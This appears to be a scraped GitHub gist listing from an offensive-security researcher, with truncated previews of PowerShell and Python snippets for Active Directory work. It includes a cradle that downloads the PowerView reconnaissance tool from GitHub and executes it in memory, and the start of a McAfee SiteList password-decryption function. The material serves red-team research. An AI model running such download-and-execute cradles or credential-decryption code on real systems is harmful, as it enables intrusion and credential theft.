This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# user to SID | |
(New-Object System.Security.Principal.NTAccount("DOMAIN","USER")).Translate([System.Security.Principal.SecurityIdentifier]).Value | |
# SID to user | |
(New-Object System.Security.Principal.SecurityIdentifier("SID")).Translate( [System.Security.Principal.NTAccount]).Value |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SourceDomain | TargetDomain | TrustType | TrustDirection | |
---|---|---|---|---|
finance.mothership.com | mothership.com | ParentChild | Bidirectional | |
mothership.com | corp.mothership.com | ParentChild | Bidirectional | |
mothership.com | finance.mothership.com | ParentChild | Bidirectional | |
mothership.com | engineering.mothership.com | ParentChild | Bidirectional | |
corp.mothership.com | mothership.com | ParentChild | Bidirectional | |
corp.mothership.com | subsidiary.com | External | Inbound | |
finance.mothership.com | mothership.com | ParentChild | Bidirectional | |
engineering.mothership.com | mothership.com | ParentChild | Bidirectional | |
subsidiary.com | product.subsidiary.com | ParentChild | Bidirectional |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SourceDomain | TargetDomain | TrustType | TrustDirection | |
---|---|---|---|---|
finance.mothership.com | mothership.com | ParentChild | Bidirectional | |
mothership.com | corp.mothership.com | ParentChild | Bidirectional | |
mothership.com | finance.mothership.com | ParentChild | Bidirectional | |
mothership.com | contracts.mothership.com | ParentChild | Bidirectional | |
corp.mothership.com | mothership.com | ParentChild | Bidirectional | |
contracts.mothership.com | mothership.com | ParentChild | Bidirectional | |
contracts.mothership.com | product.othercompany.com | External | Inbound | |
product.othercompany.com | contracts.mothership.com | External | Outbound | |
product.othercompany.com | othercompany.com | ParentChild | Bidirectional |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Keybase proof | |
I hereby claim: | |
* I am harmj0y on github. | |
* I am harmj0y (https://keybase.io/harmj0y) on keybase. | |
* I have a public key whose fingerprint is FFD5 77A3 2B3A 2B41 11F4 383A FA2F 9AA5 3110 89D3 | |
To claim this, I am signing this object: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Translate-Canonical { | |
<# | |
.SYNOPSIS | |
Converts a user@fqdn to NT4 format. | |
.LINK | |
http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats | |
#> | |
[CmdletBinding()] | |
param( | |
[String]$User |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-DecryptedSitelistPassword { | |
# PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ | |
# Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com) | |
# port by @harmj0y | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Mandatory = $True)] | |
[String] | |
$B64Pass | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from impacket import smbserver | |
import sys, argparse, threading, ConfigParser, time, os | |
class ThreadedSMBServer(threading.Thread): | |
""" | |
Threaded SMB server that can be spun up locally. | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$RSA = New-RSAKeyPair | |
# local tests | |
$ComputerName = 'localhost' | |
$StorePath = 'C:\Temp\temp.bin' | |
Write-Host "`n[$ComputerName] AES Storepath : $StorePath" | |
".\secret.txt" | Write-EncryptedStore -StorePath $StorePath -Key 'Password123!' | |
Read-EncryptedStore -StorePath $StorePath -Key 'Password123!' -List | |
Get-EncryptedStoreData -StorePath $StorePath | Remove-EncryptedStore |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$GroupData = @{} | |
$UserData = @{} | |
$ServerData = @{} | |
Import-CSV .\DomainGroups.csv | ForEach-Object { | |
if($GroupData[$_.GroupName]) { | |
$_.GroupName = $GroupData[$_.GroupName] | |
} | |
else { | |
$guid = ([guid]::NewGuid()).Guid |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add-Type -AssemblyName System.Security | |
$Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1') | |
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content) | |
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine) | |
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine))) |
OlderNewer